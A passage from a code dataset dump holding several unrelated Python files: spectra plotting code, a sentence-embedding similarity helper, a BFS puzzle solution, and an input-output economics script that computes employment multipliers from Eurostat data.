cb14.ax.set_yticklabels(cb14.ax.get_yticklabels(), fontsize=ticksize)\n # cb13.ax.yaxis.set_major_locator(plt.MaxNLocator(5))\n # Housekeeping\n plt.setp(ax01.get_yticklabels(), visible=False) # Turn off ticks for y axes\n plt.setp(ax02.get_yticklabels(), visible=False)\n plt.setp(ax11.get_yticklabels(), visible=False)\n plt.setp(ax12.get_yticklabels(), visible=False)\n # plt.setp(ax75.get_yticklabels(), visible=False)\n # plt.setp(ax76.get_yticklabels(), visible=False)\n fig.savefig('xyspectra_nwcompare_zm.png')\n return fig.show()\n\ndef maxmode_kx(nx):\n ld = nx / 2\n\n# Spectra maximum by wavenumber kx\n fig, ax = plt.subplots()\n plt.plot(kx[1:nkx, 0], ek_xy_ql[:, ind_ek_ql[1]], 'blue', label='$\\Lambda_x$ = 0 (QL)')\n plt.plot(kx[1:nkx, 0], ek_xy_gql2[:, ind_ek_gql2[1]], 'orange', label='$\\Lambda_x$ = 2 (GQL)')\n plt.plot(kx[1:nkx, 0], ek_xy_gql3[:, ind_ek_gql3[1]], 'g', label='$\\Lambda_x$ = 3 (GQL)')\n plt.plot(kx[1:nkx, 0], ek_xy_gql8[:, ind_ek_gql8[1]], 'r', label='$\\Lambda_x$ = 8 (GQL)')\n plt.plot(kx[1:nkx, 0], ek_xy_nl[:, ind_ek_dns[1]], 'purple', label='$\\Lambda_x$ = %i (NL)' % ld)\n # ##plt.clabel(contour4, inline=True, fontsize=8)\n # ax.set_title('2D Horizontal (x-y) Energy Spectrum, DNS')\n ax.set_xlabel('$k_x$', fontsize=fsize)\n ax.set_xscale('log')\n ax.set_ylabel('$E_{xy}$', fontsize=fsize)\n ax.set_yscale('log')\n legend = ax.legend(loc='best', shadow=True)\n ax.tick_params(axis='both', which='major', labelsize=ticksize)\n ax.yaxis.set_minor_locator(plt.MaxNLocator(3))\n fig.savefig('maxmode_kx.png')\n return plt.show()\n\ndef maxmode_kx_zoom(nx):\n ld = nx / 2\n\n# Spectra maximum by wavenumber kx\n fig, ax = plt.subplots()\n plt.plot(kx[1:5, 0], ek_xy_ql[0:4, ind_ek_ql[1]], 'blue', label='$\\Lambda_x$ = 0 (QL)')\n plt.plot(kx[1:5, 0], ek_xy_gql2[0:4, ind_ek_gql2[1]], 'orange', label='$\\Lambda_x$ = 2 (GQL)')\n plt.plot(kx[1:5, 0], ek_xy_gql3[0:4, ind_ek_gql3[1]], 'g', label='$\\Lambda_x$ = 3 (GQL)')\n plt.plot(kx[1:5, 0], ek_xy_gql8[0:4, ind_ek_gql8[1]], 'r', label='$\\Lambda_x$ = 8 (GQL)')\n plt.plot(kx[1:5, 0], ek_xy_nl[0:4, ind_ek_dns[1]], 'purple', label='$\\Lambda_x$ = %i (NL)' % ld)\n # ##plt.clabel(contour4, inline=True, fontsize=8)\n # ax.set_title('2D Horizontal (x-y) Energy Spectrum, zoomed in, DNS')\n ax.set_xlabel('$k_x$', fontsize=fsize)\n ax.set_xscale('log')\n ax.set_ylabel('$E_{xy}$', fontsize=fsize)\n ax.set_yscale('log')\n legend = ax.legend(loc='best', shadow=True)\n ax.tick_params(axis='both', which='major', labelsize=ticksize)\n ax.yaxis.set_minor_locator(plt.MaxNLocator(3))\n fig.savefig('maxmode_kx_zoom.png')\n return plt.show()\n\ndef maxmode_kx_noql(nx):\n ld = nx / 2\n\n# Spectra maximum by wavenumber kx\n fig, ax = plt.subplots()\n plt.plot(kx[1:nkx, 0], ek_xy_gql2[:, ind_ek_gql2[1]], 'orange', label='$\\Lambda_x$ = 2 (GQL)')\n plt.plot(kx[1:nkx, 0], ek_xy_gql3[:, ind_ek_gql3[1]], 'g', label='$\\Lambda_x$ = 3 (GQL)')\n plt.plot(kx[1:nkx, 0], ek_xy_gql8[:, ind_ek_gql8[1]], 'r', label='$\\Lambda_x$ = 8 (GQL)')\n plt.plot(kx[1:nkx, 0], ek_xy_nl[:, ind_ek_dns[1]], 'purple', label='$\\Lambda_x$ = %i (NL)' % ld)\n # ##plt.clabel(contour4, inline=True, fontsize=8)\n # ax.set_title('2D Horizontal (x-y) Energy Spectrum, DNS')\n ax.set_xlabel('$k_x$', fontsize=fsize)\n ax.set_xscale('log')\n ax.set_ylabel('$E_{xy}$', fontsize=fsize)\n ax.set_yscale('log')\n legend = ax.legend(loc='best', shadow=True)\n ax.tick_params(axis='both', which='major', labelsize=ticksize)\n ax.yaxis.set_minor_locator(plt.MaxNLocator(3))\n fig.savefig('maxmode_kx.png')\n return plt.show()\n\ndef maxmode_ky(nx):\n# Spectra maximum by wavenumber ky\n ld = nx / 2\n fig, ax = plt.subplots()\n plt.plot(ky[0, 1:nkx], ek_xy_ql[ind_ek_ql[0], :], 'blue', label='$\\Lambda_x$ = 0 (QL)')\n plt.plot(ky[0, 1:nkx], ek_xy_gql2[ind_ek_gql2[0], :], 'orange', label='$\\Lambda_x$ = 2 (GQL)')\n plt.plot(ky[0, 1:nkx], ek_xy_gql3[ind_ek_gql3[0], :], 'g', label='$\\Lambda_x$ = 3 (GQL)')\n plt.plot(ky[0, 1:nkx], ek_xy_gql8[ind_ek_gql8[0], :], 'r', label='$\\Lambda_x$ = 8 (GQL)')\n plt.plot(ky[0, 1:nkx], ek_xy_nl[ind_ek_dns[0], :], 'purple', label='$\\Lambda_x$ = %i (NL)' % ld)\n # ##plt.clabel(contour4, inline=True, fontsize=8)\n # ax.set_title('2D Horizontal (x-y) Energy Spectrum, DNS')\n ax.set_xlabel('$k_y$', fontsize=fsize)\n ax.set_xscale('log')\n ax.set_ylabel('$E_{xy}$', fontsize=fsize)\n ax.set_yscale('log')\n ax.tick_params(axis='both', which='major', labelsize=ticksize)\n ax.yaxis.set_minor_locator(plt.MaxNLocator(3))\n # ax.yaxis.set_minor_locator(plt.MaxNLocator(5))\n legend = ax.legend(loc='best', shadow=True)\n fig.savefig('Ek_ky.png')\n return plt.show()\n","sub_path":"spectra.py","file_name":"spectra.py","file_ext":"py","file_size_in_byte":10305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"283440858","text":"from sentence_transformers import SentenceTransformer\nimport numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\nmodel = SentenceTransformer('roberta-base-nli-stsb-mean-tokens')\n\n\ndef embed(input):\n return model.encode(input)\n\n\ndef get_scores(input_query, input_corpus, topk=5):\n emb_corpus = np.array(model.encode(input_corpus))\n emb_query = np.array(model.encode([input_query]))\n results = cosine_similarity(emb_query, emb_corpus)[0]\n topk = results.argsort()[-topk:][::-1]\n scores = results[topk]\n sentences = [input_corpus[idx] for idx in topk]\n return [str(s) for s in scores], sentences\n\n\n# %%\n# lines = []\n# with open('dataset.txt') as f:\n# lines = f.readlines()\n# query_text = 'time sharing operational system'\n\n# s, sen = get_scores(query_text, lines)\n","sub_path":"sentenceROBERTA_model.py","file_name":"sentenceROBERTA_model.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"13014227","text":"# 21:00 start\n# 21:55 finish\n\nfrom sys import stdin\ninput = stdin.readline\nfrom collections import deque\n\n# 상이 갈 수 있는 곳\ndr = (-3, -2, 2, 3, 3, 2, -2, -3)\ndc = (2, 3, 3, 2, -2, -3, -3, -2)\n\n# 위치별 장애물\nobstacle = {0: ((-1, 0), (-2, 1)),\n 1: ((0, 1), (-1, 2)),\n 2: ((0, 1), (1, 2)),\n 3: ((1, 0), (2, 1)),\n 4: ((1, 0), (2, -1)),\n 5: ((0, -1), (1, -2)),\n 6: ((0, -1), (-1, -2)),\n 7: ((-1, 0), (-2, -1))}\n\ndef bfs():\n board = [[0] * 9 for _ in range(10)]\n board[sr][sc] = 1\n Q = deque([(sr, sc)])\n while Q:\n r, c = Q.popleft() \n for d in range(8):\n nr = r + dr[d]\n nc = c + dc[d]\n # 격자 밖으로 나가거나 이미 방문했다면\n if not (0 <= nr < 10 and 0 <= nc < 9) or board[nr][nc]:\n continue\n\n # 이동 중 장애물(왕) 만나면\n flag = True\n for wr, wc in obstacle[d]:\n if (r+wr, c+wc) == (kr, kc):\n flag = False # 그 방향으로 이동 불가 표시\n break\n if not flag:\n continue\n\n if (nr, nc) == (kr, kc): # 왕 만나면 탈출\n return board[r][c]\n\n # 정상 이동\n board[nr][nc] = board[r][c] + 1\n Q.append((nr, nc))\n \n return -1 # 왕에 도달하지 못하면\n\n# main\nsr, sc = map(int, input().split()) # 상 위치\nkr, kc = map(int, input().split()) # 왕 위치\nprint(bfs())","sub_path":"daily_study/ProblemSolving/16509_장군.py","file_name":"16509_장군.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"30868601","text":"#\n# MATRICE EMPLOYMENT MULTIPLIER : LMULT\n# input : naio_cp18i_r2.tsv (dom)\n# : nama_nace64_e.tsv\n#\nimport sys\nimport glob\nfrom numpy import *\nfrom numpy.linalg import inv\n#import DBAccess\nimport\tFileAccessMatrix\n\ndirWork = sys.argv[1]\ndirUse = dirWork \ndirTXT\t\t\t= dirUse\t\t\t+'\\\\Input\\\\txt'\ndirInput = dirUse +'\\\\Input\\\\tsv\\\\nace2'\ndirOutput = dirUse +'\\\\Output\\\\matrix'\ndirLog = dirUse +'\\\\Log'\n\nfichierCSV = dirInput + '\\\\naio_cp18i_r2.tsv'\nfichierEMP = dirInput + '\\\\nama_nace64_e.tsv'\nfileLog = open(dirLog + '\\\\matrixILmult.log', 'w')\nfileOutput = open(dirOutput + '\\\\matrixIDBLmult.csv', 'w')\n\n# variables globales recues en parametre, le nom du fichier input : spi_tree_indicator_(country,rev1,rev2,sector).csv\n# fichier = fichier input a traiter\n\n#fonction qui evite les decalages :\n#on regarde ce qui existe dans le vecteur P1 et pas dans celui de la matrice, \n#dans ce cas on ajoute les codes produits de P1 avec des valeurs 0 \n# \ndef vectorAtraiter(vectorMatrice, vectorP1):\n vectorOutput = []\n lstProdP1 = []\n lstProdMat = [] \n for c in (range(0,len(vectorP1))):\n productLst = vectorP1[c].split('#')\n productP1 = productLst[0]\n lstProdP1 = lstProdP1 + [productP1]\n #lstProdMat = [] \n for p in (range(0,len(vectorMatrice))): \n pLst = vectorMatrice[p].split('#')\n productMatrix = pLst[0]\n\n if productMatrix == productP1:\n lstProdMat = lstProdMat + [productMatrix]\n vectorOutput = vectorOutput + [vectorMatrice[p]]\n setcolP1 = set(lstProdP1)\n setcolMat = set(lstProdMat) \n setColNotInMat = setcolP1 - setcolMat\n vectorReturn = vectorOutput\n if (len(setColNotInMat)>0): \n for c in setColNotInMat:\n lineProd = c + '#0'\n vectorReturn = vectorReturn + [lineProd] \n return vectorReturn\n \ndef fonctionVectorZero(vectorP1):\n vectorInput = vectorP1 \n vectorOutput = []\n for c in (range(0,len(vectorInput))):\n productLst = vectorInput[c].split('#')\n productOuput = productLst[0] + '#0'\n vectorOutput = vectorOutput + [productOuput]\n return vectorOutput \n \ndef vectorCol(colP1,colToBeP1,dicNoProduct,keyP1):\n lstProdP1 = []\n for c in (range(0,len(colP1))):\n lineProd = colP1[c].split('#')\n lstProdP1= lstProdP1 + [lineProd[0]]\n lstToBeP1 = []\n lstColAll = []\n for c in (range(0,len(colToBeP1))): \n lineProd = colToBeP1[c].split('#')\n keyNoProduct = keyP1 + \"#\" + lineProd[0]\n if dicNoProduct.has_key(keyNoProduct):\n continue\n else:\n lstToBeP1= lstToBeP1 + [lineProd[0]]\n lstColAll= lstColAll + [colToBeP1[c]] \n setcolP1 = set(lstProdP1)\n setToBeP1 = set(lstToBeP1) \n setColNotInToBeP1= setcolP1 - setToBeP1 \n if (len(setColNotInToBeP1)>0): \n for c in setColNotInToBeP1:\n lineProd = c + '#0'\n lstColAll= lstColAll + [lineProd]\n return lstColAll\n \ndef divide(x, y):#\n if (x == None):\n x=0\n else:\n x = x.split('#')\n xf= float(x[1])\n p = x[0]\n if (y == None):\n y=0\n else:\n y = y.split('#')\n yf= float(y[1])\n p = y[0]\n try: \n tot=xf/yf\n except:\n tot=0 \n valR = tot \n return valR\n \n#calcul de la matrice ce Leontief\ndef traitementMatriceA(keyP1, matriceA, dicRealP1, mVector):\n\tnbrEle = len(matriceA)\n\tmatriceIdentity = identity(nbrEle) # on cree la matrice identite tout des 1 en diagonale\n\tmatrixIA = matriceIdentity - matriceA # soustraction de la matrice A de l'identite\n\tmatriceL = inv(matrixIA) # on inverse la matrice IA pour obtenir la matrice de Leontief\n\tmmult = dot(mVector,matriceL)#on multiplie le vectorM par la matriceL\n\t#mmult = matriceL.dot(mVector)\n\tdiagM = diag( mmult,k=0) #on diagonalise le resultat \n\tMMult = dot(diagM,matriceL)\n\t#sumMMult = MMult.sum(axis=0) #somme des colonnes par colonne de la matrice dans une table (axis=0) \n\t#Resultat \n\tlstKeyP1 = keyP1.split(\"#\")\n\tcodeCountry = lstKeyP1[0]\n\tyyyy = lstKeyP1[1]\n\tligne = 'New;Employment multiplier for ;lmult;'+str(codeCountry)+';'+str(yyyy)+'\\n'\n\tfileOutput.write(ligne) \n \n\t#nameFile = codeCountry+yyyy\n\t#fileMatrice = open(dirCSV + '\\\\matrixL_R2_' + nameFile +'.csv', 'w')\n\t#ligne = 'Matrix L for '+str(codeCountry)+','+str(yyyy)+'\\n'\n\t#fileMatrice.write(ligne)\n\t#ligne des noms des produits par pays/annee\n\t#ligne = codeCountry+\",\"+yyyy\n\t#titre des codes CPA\n\tligne = 'Code;'\n\tl = 0\n\ttabCode = []\n\tdicRealP1[keyP1]['P1'].sort()\n\tfor n in dicRealP1[keyP1]['P1']:\n\t\tcodeProd = n.split(\"#\")\n\t\tligne = ligne+str(codeProd[0])+\",\"\n\t\ttabCode.append(codeProd[0]) \n\tfileOutput.write(ligne[0:-1]+'\\n')\n\t'''\n\t#corps de la matrice\n\tfor l in range(0,nbrEle):\n\t\tligne=tabCode[l]+';'\n\t\tfor c in range(0,nbrEle):\n\t\t\tligne = ligne+str(matriceL[l,c])+\",\" \n\t\t\t#ligne = ligne+\",\" + str(MMult[l,c]) \n\t\tfileOutput.write(ligne[0:-1]+'\\n') \n\t#ligne des valeurs des produits par pays/annee \n\t#ligne = codeCountry+\",\"+yyyy\n\t#valeur totale \n\n\tligne='techlmult;'\n\tfor i in range(0,len(mVector)):\n\t\tligne = ligne+str(mVector[i])+\",\" \n\tfileOutput.write(ligne[0:-1]+'\\n') \n\t''' \n\tligne='default;'\n\tfor i in range(0,len(mmult)):\n\t\tligne = ligne+str(mmult[i])+\",\" \n\tfileOutput.write(ligne[0:-1]+'\\n') \n \ndef traitementMatrice(dicRealP1, dicMatrice, dicNoProduct):\n codeP1 = dicRealP1.keys() \n codeP1.sort()\n mVector = [] \n for keyP1 in codeP1: #key = country,year\n nbrEleP1 = len(dicRealP1[keyP1]['P1'])\n matriceA = zeros((nbrEleP1,nbrEleP1), dtype=float)\n ligne = 0\n col = 0\n dicRealP1[keyP1]['P1'].sort()\n dicRealP1[keyP1]['EMP'].sort()\n colP1 = dicRealP1[keyP1]['P1']\n colToBeP1 = dicRealP1[keyP1]['EMP']\n if (len(colP1)!=len(colToBeP1)):\n fileLog.write('nbr product P1 ='+str(len(colP1))+' nbr product EMP ='+str(len(colToBeP1))+' for '+str(keyP1)+'\\n') \n colEmp = vectorCol(colP1,colToBeP1,dicNoProduct,keyP1) #la fonction fait un vecteur avec TOUTES les colonnes\n colP1.sort()\n colEmp.sort()\n vectorP1 = dicRealP1[keyP1]['P1']\n vectorZero = fonctionVectorZero(vectorP1) \n mVector = map(divide, colEmp, colP1) \n for productLst in dicRealP1[keyP1]['P1']:#chaque ligne est une liste avec le code produit et la valeur \n productLst = productLst.split('#')\n productP1 = productLst[0]\n valueP1 = float(productLst[1])\n keyMatriceP1 = keyP1 + '#' + productP1\n ligne = 0\n if dicNoProduct.has_key(keyMatriceP1): \n continue\n else:\n try:# la ligne de la matrice est dans P1\n dicMatrice[keyMatriceP1].sort()\n vectorMatrice = dicMatrice[keyMatriceP1]\n except:#la ligne est dans P1 mais PAS dans la matrice, on met un vector avec les valeurs 0 ex: T pour EE\n vectorMatrice = vectorZero\n fileLog.write('le produit '+ productP1+ ' existe dans P1 mais pas dans la MATRICE = '+keyP1+'\\n') \n vectorP1 = dicRealP1[keyP1]['P1']\n #evite les decalages entre P1 et la Matrice, on peux avoir une colonne dans P1 et pas dans la matrice\n #dans ce cas on ajoute une colonne avec des zero\n ligneAtraiter = vectorAtraiter(vectorMatrice, vectorP1) \n ligneAtraiter.sort() \n for ligneMatrice in ligneAtraiter:#ATTENTION CHAQUE LIGNE CORRESPOND AUX ELEMENTS D'UNE ligne\n ligneMatrice = ligneMatrice.split('#')\n product = ligneMatrice[0] \n value = float(ligneMatrice[1])\n keyNoProduct = keyP1 + \"#\" + product \n if dicNoProduct.has_key(keyNoProduct): \n continue\n #on calcul la matrice A qui est celle des coeficient technique\n else:\n if (ligne < nbrEleP1):#le nombre element dans la ligne doit etre le meme que celui de P1 \n matriceA[ligne,col] = value/valueP1\n ligne+=1\n else:\n fileLog.write('Probleme matrice: nbrLigne > nbrEleP1 '+keyMatriceP1+',Col='+str(col)+',ligne='+str(ligne)+',maxEle='+str(nbrEleP1)+',nbr produits dans Matrice Produit(nbr Ligne)='+str(len(dicMatrice[keyMatriceP1]))+'\\n')\n if (col < nbrEleP1): \n col+=1\n else:\n fileLog.write('Probleme matrice: nbrColonne > nbrEleP1 '+keyMatrice+',Col='+str(col)+',ligne='+str(ligne)+',maxEle='+str(nbrEleP1)+'\\n')\n #print keyP1, 'len(matriceA)=',len(matriceA), ' len( dicRealP1)=' ,len(dicRealP1) , ' len( mVector)=' ,len(mVector), mVector[len(mVector)-1] \n traitementMatriceA(keyP1, matriceA, dicRealP1, mVector)\n \ndef readFileEMP(dicMatriceP1Row,dicGeoYearProd):\n\tfichierInput = open(fichierEMP,'r')\n\trec1er = fichierInput.readline() #1er rec avec les meta\n\trecMeta = rec1er.split(',')\n\trecGeoTime = recMeta[4].strip('\\n').split('\\t')\n\t#unit,nace_r2,indic_na,sector,geo\\time\t2012-1970 \n\tfor ligneCSV in fichierInput:\n\t\tligneCSV = ligneCSV.replace(':','0') \n\t\tligne = ligneCSV.split(',') \n\t\tunit = ligne[0].strip()\n\t\tnace_r2 = ligne[1].strip()\n\t\tindic_na = ligne[2].strip()\n\t\tsector = ligne[3].strip() \n\t\tligneGeoTime = ligne[4].strip('\\n').split('\\t')\n\t\tgeo = ligneGeoTime[0].strip() \n\t\tif (geo == 'FI' or geo =='NL'):\n\t\t\tif (unit == '1000PERS')and(nace_r2 != 'TOTAL')and(indic_na == 'EMP')and(sector == 'S1'): \n\t\t\t\tfor i in range(1,len(recGeoTime)): #record des metas, on boucle sur les annees\n\t\t\t\t\tyy = recGeoTime[i].strip() #record des metas\n\t\t\t\t\tkeyGeoYY = geo + '#' + yy\n\t\t\t\t\tcol = nace_r2\n\t\t\t\t\tkeyGeoYearProd = geo+yy+col\n\t\t\t\t\tif dicGeoYearProd.has_key(keyGeoYearProd): #on verifie que dans chaque ligne se trouve les produits des colonnes de P1 \n\t\t\t\t\t\tvalue = col + '#' + ligneGeoTime[i].strip()\n\t\t\t\t\t\tkeyProd = 'EMP' \n\t\t\t\t\t\tif dicMatriceP1Row.has_key(keyGeoYY):\n\t\t\t\t\t\t\tif dicMatriceP1Row[keyGeoYY].has_key(keyProd):\n\t\t\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY][keyProd] = dicMatriceP1Row[keyGeoYY][keyProd] + [value] \n\t\t\t\t\t\t\telse: \n\t\t\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY][keyProd] = [value]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY] = {} #on cree un nouveau dictionnaire pour le couple valeur, produit par ligne de produit\n\t\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY][keyProd] = [value] \n\tfichierInput.close()\n\treturn dicMatriceP1Row \n#unit,t_cols2,t_rows2,geo\\time\t2010 \t2009 \t2008 \t2005 \t2000 \t1995 \ndef traitementFichierCSV():\n\tdicMatrice = {}\n\tdicP1 = {}\n\tdicMatriceP1Row = {} \n\tdicSelectEMP = {}\n\tdicEMP = {}\n\tdicGeoYearProd = {} \n\tdicRealP1 = {}\n\tdicNoProduct = {}\n\tdicNace\t\t = {}\n\t#dicNace\t\t\t =\tDBAccess.dicNace('nace2','NAMA','0')\n\tdicNace\t\t\t =\tFileAccessMatrix.dicNace('nace2',dirTXT)\n\tfichierInput = open(fichierCSV,'r')\n\trec1er = fichierInput.readline() #1er rec avec les meta\n\trecMeta = rec1er.split(',')\n\trecGeoTime = recMeta[3].strip('\\n').split('\\t')\n \n\t#MIO_EUR,CPA_A01,B1G,AT\t: \t1963.57 \t2455.13 \t: \t: \t: \n\tfor ligneCSV in fichierInput:\n\t\tligneCSV = ligneCSV.replace(':','0') \n\t\tligne = ligneCSV.split(',') \n\t\tunit = ligne[0].strip()\n\t\tcol = ligne[1].strip()\n\t\trow = ligne[2].strip()\n\t\tligneGeoTime = ligne[3].strip('\\n').split('\\t')\n\t\tgeo = ligneGeoTime[0].strip()\n\t\tif (unit == 'MIO_EUR') and (geo == 'FI' or geo =='NL'):\n\t\t\t#on met chaque ligne de produits dans un dictionnnaire\n\t\t\tif\tdicNace.has_key(col) and dicNace.has_key(row) and (col != 'TOTAL') and (row != 'TOTAL'):\t\t\t\n\t\t\t\tfor i in range(1,len(recGeoTime)): #record des metas, on boucle sur les annees\n\t\t\t\t\tyy = recGeoTime[i].strip() #record des metas \n\t\t\t\t\tkeyMatrice = geo + '#' + yy + '#' + col\n\t\t\t\t\tvalue = row + '#' + ligneGeoTime[i].strip()\n\t\t\t\t\tif dicMatrice.has_key(keyMatrice): # ATTENTION CHAQUE LIGNE CORRESPOND AUX ELEMENTS D'UNE COLONNE\n\t\t\t\t\t\tdicMatrice[keyMatrice] = dicMatrice[keyMatrice] + [value]\n\t\t\t\t\telse:\n\t\t\t\t\t\tdicMatrice[keyMatrice] = [value]\n\t\t\tif row == 'P1'and dicNace.has_key(col) and col != 'TOTAL': \t\t\t\n\t\t\t\tfor i in range(1,len(recGeoTime)): #record des metas, on boucle sur les annees\n\t\t\t\t\tyy = recGeoTime[i].strip() #record des metas\n\t\t\t\t\tkeyGeoYY = geo + '#' + yy \n\t\t\t\t\tvalue = col + '#' + ligneGeoTime[i].strip()\n\t\t\t\t\tkeyProd = row\n\t\t\t\t\tkeyGeoYearProd = geo+yy+col\n\t\t\t\t\tdicGeoYearProd[keyGeoYearProd] = keyGeoYearProd\n\t\t\t\t\tif dicMatriceP1Row.has_key(keyGeoYY):\n\t\t\t\t\t\tif dicMatriceP1Row[keyGeoYY].has_key(keyProd):\n\t\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY][keyProd] = dicMatriceP1Row[keyGeoYY][keyProd] + [value] \n\t\t\t\t\t\telse: \n\t\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY][keyProd] = [value]\n\t\t\t\t\telse:\n\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY] = {} #on cree un nouveau dictionnaire pour le couple valeur, produit par ligne de produit\n\t\t\t\t\t\tdicMatriceP1Row[keyGeoYY][keyProd] = [value]\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \n\tfichierInput.close()\n\t#on complete le dictionnaire P1 avec la partie EMP qui vient du fichier naio_cp19_r2.tsv \n\tlen(dicGeoYearProd) \n\tdicMatriceP1Row = readFileEMP(dicMatriceP1Row,dicGeoYearProd) \n\tdicKeyP1Row = dicMatriceP1Row.keys()\n\tdicKeyP1Row.sort()\n\n #SELECTION DES MATRICES A TRAITER \n\tfor keyP1 in dicKeyP1Row: #key = country,year\n\t\tmatriceVide = 1 # on considere que la matrice est vide au depart\n\t\tL68_test = 0\n\t\tentryL68EMP = 'L68#0'\n\t\tentryL68AEMP = 'L68A#0' \n\t\tentryL68BEMP = 'L68B#0'\n\t\tentryL68P1 = 'L68#0'\n\t\tentryL68AP1 = 'L68A#0' \n\t\tentryL68BP1 = 'L68B#0' \n\t\tdicRealP1[keyP1] = {} # dictionnaire avec les matrices P1 a traiter \n\t\t#on s'assure que la liste P1 est dans le bon ordre \n\t\tkeyRow = 'P1'\n\t\tdicMatriceP1Row[keyP1][keyRow].sort()#on tri la liste des produits P1 \n\t\tdicRealP1[keyP1][keyRow] = []\n\n\t\tfor productLst in dicMatriceP1Row[keyP1][keyRow]:#chaque ligne est une liste avec le code produit et la valeur \n\t\t\tproductLst = productLst.split('#')\n\t\t\tproduct = productLst[0]\n\t\t\tvalue = productLst[1]\n\t\t\tif (value != '0'):\n\t\t\t\tmatriceVide = 0 #la matrice ne sera pas vide,il y a au moins une col de remplie\n\t\t\t\tif (product == 'L68'):\n\t\t\t\t\tL68_test = 100\n\t\t\t\t\tentryL68P1 = product + '#' + value \n\t\t\t\t\tcontinue\n\t\t\t\tif (product == 'L68A'):\n\t\t\t\t\tL68_test = L68_test + 10 \n\t\t\t\t\tentryL68AP1 = product + '#' + value \n\t\t\t\t\tcontinue \n\t\t\t\tif (product == 'L68B'):\n\t\t\t\t\tL68_test = L68_test + 1\n\t\t\t\t\tentryL68BP1 = product + '#' + value \n\t\t\t\t\tcontinue\n\t\t\t\tentryP1 = product + '#' + value\n\t\t\t\tdicRealP1[keyP1][keyRow] = dicRealP1[keyP1][keyRow] + [entryP1] \n\t\t\telse:\n\t\t\t\tif (matriceVide == 0): #si la matrice n'est pas vide alors on enleve les col/row qui n'ont pas de valeur\n\t\t\t\t\t\t\t\t\t\t#on fait le test pour eviter que le logfile soit aussi rempli avec toutes les col\n\t\t\t\t\t\t\t\t\t\t#vide d'une matrice vide\n\t\t\t\t\tkeyNoProduct = keyP1 + \"#\" + product \n\t\t\t\t\tdicNoProduct[keyNoProduct] = product #on ne va pas traiter la ligne avec la valeur zero \n\t\t\t\t\tfileLog.write('Colonne vide pour matrice = ' + keyNoProduct +' keyRow='+keyRow +'\\n') \n\t\t#on traite les matrices uniquement pour celles qui ont une ligne EMP \n\t\tkeyRow = 'EMP'\n\t\tdicMatriceP1Row[keyP1][keyRow].sort() \n\t\tdicRealP1[keyP1][keyRow] = []\n\t\tfor productLst in dicMatriceP1Row[keyP1][keyRow]:#chaque ligne est une liste avec le code produit et la valeur \n\t\t\tproductLst = productLst.split('#')\n\t\t\tproduct = productLst[0]\n\t\t\tvalue = productLst[1]\n\t\t\tif (value != '0'): \n\t\t\t\tif (product == 'L68'): \n\t\t\t\t\tentryL68EMP = product + '#' + value\n\t\t\t\t\tcontinue\n\t\t\t\tif (product == 'L68A'): \n\t\t\t\t\tentryL68AEMP = product + '#' + value\n\t\t\t\t\tcontinue \n\t\t\t\tif (product == 'L68B'):\n\t\t\t\t\tentryL68BEMP = product + '#' + value\n\t\t\t\t\tcontinue\n\t\t\t\tentryP1 = product + '#' + value\n\t\t\t\tdicRealP1[keyP1][keyRow] = dicRealP1[keyP1][keyRow] + [entryP1] \n\t\t\t\t\t\t\t \n\t\t#traitement des cas de L68\n\t\tif (L68_test == 111):\n\t\t\tdicRealP1[keyP1]['P1'] = dicRealP1[keyP1]['P1'] + [entryL68AP1] + [entryL68BP1]\n\t\t\tdicRealP1[keyP1]['EMP'] = dicRealP1[keyP1]['EMP'] + [entryL68AEMP] + [entryL68BEMP] \n\t\t\tkeyNoProduct = keyP1 + \"#L68\" \n\t\t\tdicNoProduct[keyNoProduct] = product #on ne va pas traiter la ligne avec la valeur zero \n\t\t\tfileLog.write('Colonne L68 enleve pour matrice = ' + keyP1 +'\\n') \n\t\tif (L68_test == 110):\n\t\t\tdicRealP1[keyP1]['P1'] = dicRealP1[keyP1]['P1'] + [entryL68P1]\n\t\t\tdicRealP1[keyP1]['EMP'] = dicRealP1[keyP1]['EMP'] + [entryL68EMP] \n\t\t\tkeyNoProduct = keyP1 + \"#L68A\" \n\t\t\tdicNoProduct[keyNoProduct] = product #on ne va pas traiter la ligne avec la valeur zero \n\t\t\tfileLog.write('Colonne L68A enleve pour matrice = ' + keyP1 +'\\n') \n\t\tif (L68_test == 101):\n\t\t\tdicRealP1[keyP1]['P1'] = dicRealP1[keyP1]['P1'] + [entryL68BP1]\n\t\t\tdicRealP1[keyP1]['EMP'] = dicRealP1[keyP1]['EMP'] + [entryL68BEMP] \n\t\t\tkeyNoProduct = keyP1 + \"#L68\" \n\t\t\tdicNoProduct[keyNoProduct] = product #on ne va pas traiter la ligne avec la valeur zero \n\t\t\tfileLog.write('Colonne L68 enleve pour matrice = ' + keyP1 +'\\n')\n\t\tif (L68_test == 100): \n\t\t\tdicRealP1[keyP1]['P1'] = dicRealP1[keyP1]['P1'] + [entryL68P1]\n\t\t\tdicRealP1[keyP1]['EMP'] = dicRealP1[keyP1]['EMP'] + [entryL68EMP] \n\t\tif (L68_test == 11):\n\t\t\tdicRealP1[keyP1]['P1'] = dicRealP1[keyP1]['P1'] + [entryL68AP1] + [entryL68BP1]\n\t\t\tdicRealP1[keyP1]['EMP'] = dicRealP1[keyP1]['EMP'] + [entryL68AEMP] + [entryL68BEMP] \n\t\tif (L68_test == 10):\n\t\t\tdicRealP1[keyP1]['P1'] = dicRealP1[keyP1]['P1'] + [entryL68AP1]\n\t\t\tdicRealP1[keyP1]['EMP'] = dicRealP1[keyP1]['EMP'] + [entryL68AEMP] \n\t\tif (L68_test == 1):\n\t\t\tdicRealP1[keyP1]['P1'] = dicRealP1[keyP1]['P1'] + [entryL68BP1]\n\t\t\tdicRealP1[keyP1]['EMP'] = 